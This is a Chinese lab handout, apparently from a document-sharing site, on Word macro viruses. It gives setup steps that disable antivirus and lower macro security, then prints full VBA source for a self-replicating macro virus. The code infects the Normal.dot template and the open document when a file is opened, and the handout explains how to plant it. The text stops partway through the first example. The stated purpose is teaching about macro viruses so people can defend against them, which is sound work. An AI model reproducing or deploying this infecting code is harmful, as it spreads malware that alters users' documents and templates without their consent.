Word宏病毒VIP专享VIP免费

Word 宏病毒 1 . 实验目的(后果自负) Word 宏是指能组织到一起为独立命令使用的一系列Word 指令，它能使日常工作变得容易。本实验演示了宏的编写，通过两个简单的宏病毒示例，说明宏的原理及其安全漏洞和缺陷，理解宏病毒的作用机制，从而加强对宏病毒的认识，提高防范意识。 2 . 实验所需条件和环境 硬件设备：局域网，终端 PC 机。 系统软件：Window s 系列操作系统 支撑软件：Word 2003 软件设置：关闭杀毒软；打开 Word 2003，在工具宏安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板，选择信任 visual basic 项目的访问 实验环境配置如下图所示： 受感染终端受感染Word文档被感染终端 宏病毒传播示意图 3 . 实验内容和分析 为了保证该实验不至于造成较大的破坏性，进行实验感染后，被感染终端不要打开过多的word 文档，否则清除比较麻烦（对每个打开过的文档都要清除）。 3.1. 例 1 自我复制，感染 w ord 公用模板和当前文档 代码如下： 'Micro-Virus Sub Document_Open() On Error Resume Next Application.DisplayStatusBar = False Options.SaveNormalPrompt = False Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100) Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule If ThisDocument = NormalTemplate Then Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule End If With Host If .Lines(1.1) <> "'Micro-Virus" Then .DeleteLines 1, .CountOfLines .InsertLines 1, Ourcode .ReplaceLine 2, "Sub Document_Close()" If ThisDocument = nomaltemplate Then .ReplaceLine 2, "Sub Document_Open()" ActiveDocument.SaveAs ActiveDocument.FullName End If End If End With MsgBox "MicroVirus by Content Security Lab" End Sub 打开一个word 文档，然后按 Alt+F11 调用宏编写窗口（工具宏Visual Basic宏编辑器）,在左侧的project—>Microsoft Word 对象ThisDocument 中输入以上代码，保存，此时当前 word 文档就含有宏病毒，只要下次打开这个word 文档，就会执行以上代码，并将自身复制到 Normal.dot（word 文档的公共模板）和当前文档的ThisDocument 中，同时改变函数名（模板中...